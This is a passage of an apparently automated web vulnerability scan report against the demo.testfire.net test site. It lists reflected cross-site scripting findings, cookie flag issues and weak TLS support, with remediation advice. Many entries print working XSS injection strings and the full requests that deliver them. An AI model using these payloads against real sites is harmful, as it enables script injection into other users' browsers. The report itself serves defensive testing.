Detection: An alert was detected containing 15650658.00037
Request: GET
https://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%28156
50658.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 463 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 464 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650658.00127)//>*/alert(15650658.00127)/*
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 465 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650658.00127%29%2F%
2F%3E*%2Falert%2815650658.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 466 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650658.00597)</script>
Detection: An alert was detected containing 15650658.00597
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 467 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cfile=comments.txt&name=%3Cscript%3Ealert%2815650658.00597%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 468 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = b95638afc2ebb1aeee06e0a48503002c
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Secure flag must be set for Session Cookies for Application served over
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 469 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
152 CVE-2011-3389 SSLv2, SSLv3 and TLS v1.0 4.3 Medium Fail Port: tcp/8443
Vulnerable to CBC Attacks
via chosen-plaintext This server supports a version of SSL vulnerable to a Cipher Block
(BEAST) Chaining (CBC) attack. When using a block-based cipher with SSLv2,
SSLv3 or TLS v1.0, it is possible to perform a cryptographic attack
called a chosen-plaintext attack. An attack, commonly known as
"Browser Exploit Against SSL/TLS" ("BEAST") takes advantage of this
vulnerability in how the browser sets up SSL/TLS connections (e.g. for
HTTPS), and may allow an attacker to decrypt the SSL/TLS connection
to gain access to sensitive information. Although, the BEAST attack is
the only known exploit, other services not related to web servers (e.g.
IMAP) may also be vulnerable to such attack.
CVE: CVE-2011-3389
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
http://httpd.apache.org/docs/trunk/mod/mod_ssl.html#sslciphersuite
http://support.microsoft.com/kb/2643584
http://technet.microsoft.com/en-us/security/advisory/2588513
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 470 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
The server should be configured to allow only TLS versions 1.1 and 1.2,
which are not vulnerable to this CBC attack. Although the latest
versions of all major web browsers support TLS 1.1 and 1.2 enabled by
default, disabling previous versions may prevent other services than
HTTP from connecting to the server if they do not support these
versions of TLS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 471 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650642.00037)</script>
Detection: An alert was detected containing 15650642.00037
Request: GET
https://65.61.137.117/search.jsp?query=%3Cscript%3Ealert%2815650
642.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 472 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 473 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650656.00407)</script>
Detection: An alert was detected containing 15650656.00407
cfile=comments.txt&name=%3Cscript%3Ealert%2815650656.00407%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 474 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 475 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net:8080/sendFeedback - name
Injection: <script>alert(15650659.00577)</script>
Detection: An alert was detected containing 15650659.00577
cfile=comments.txt&name=%3Cscript%3Ealert%2815650659.00577%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 476 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 477 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117:8080/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 478 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 479 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650661.00617)//>*/alert(15650661.00617)/*
Detection: An alert was detected containing 15650661.00617
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 480 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 481 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 482 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Request: GET
https://65.61.137.117:8443/index.jsp?content=javascript%3A%2F%2F
%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C
%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650661.00127%29%2F%
2F%3E*%2Falert%2815650661.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 483 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 484 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 485 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 486 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650660.00037)</script>
Detection: An alert was detected containing 15650660.00037
Request: GET
http://demo.testfire.net/search.jsp?query=%3Cscript%3Ealert%281565
0660.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 487 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 488 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650660.00947)</script>
Detection: An alert was detected containing 15650660.00947
Request: GET
http://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650660.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 489 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 490 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - name
Injection: <script>alert(15650660.00557)</script>
Detection: An alert was detected containing 15650660.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650660.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 491 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 7dea7694e36255c4c48824f9a0de4e13
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 492 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 493 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 494 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 495 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650658.00947)</script>
Detection: An alert was detected containing 15650658.00947
Request: GET
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 496 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 497 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650642.00557)</script>
Detection: An alert was detected containing 15650642.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650642.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 498 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 499 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650642.00947)</script>
Detection: An alert was detected containing 15650642.00947
Request: GET
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
